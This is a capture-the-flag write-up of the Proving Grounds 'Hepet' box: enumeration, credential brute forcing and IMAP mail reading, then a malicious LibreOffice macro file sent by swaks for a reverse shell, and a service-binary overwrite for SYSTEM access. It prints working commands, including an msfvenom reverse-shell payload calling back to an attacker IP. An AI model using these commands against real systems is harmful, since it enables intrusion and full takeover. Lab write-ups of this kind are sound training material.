Hepet - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed Mail ports and HTTP port 8000 were open. Moreover, FTP and VNC ports were open in non-common ports.
Web Enumeration
Visiting the web page revealed some names. But one name had different description than others.
At first, I used username-anarchy to create a username list. Then using smtp-user-enum tool, I obtained 5 valid users.
Then I brute forced imap, smtp and SMB login. At first I tried NSR brute force. Then I tried to brute force with interesting description value and found IMAP credentials for jonas.
Then following this https://hackviser.com/tactics/pentesting/services/imap blog, I logged in to IMAP and started reading emails.
a1 LOGIN username password
a2 LIST "" "*"
a3 SELECT INBOX
a4 FETCH 1 BODY[]
One of the email suggested they are using LibreOffice and opening every document attached. So we had to do Malicious Macro Injection for LibreOffice.
Moreover, it revealed target mail mailadmin@localhost
Exploitation
Malicious Macro - LibreOffice
I found this repo (0bfxgh0st/MMG-LO), which allows you to create reverse shell macro injected libre files.
So I created a malicious ODS file. Then using swaks I sent it to mailadmin. And started waiting with netcat listener.
python mmg-ods.py windows LHOST LPORT
swaks -t mailadmin@localhost --from jonas@localhost --attach @MALICIOUS_FILE --server TARGET_IP --body "hi" --header "subject: test"
Later, I obtained the user shell.
Privilege Escalation
Service Abuse (Writeable Service Binary)
I executed PowerUp.ps1 and found that VeyonService is executed with SYSTEM privileges and I could write onto it.
So at first, I created a malicious exe file with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=8080 -f exe -o exp.exe
And then transfered it to target.
Then, I overwrote the veyon-service.exe file with my malicious file.
I had no permission to restart the service. So, I rebooted the machine using shutdown /s /t 0 command.
After waiting, I obtained the SYSTEM shell.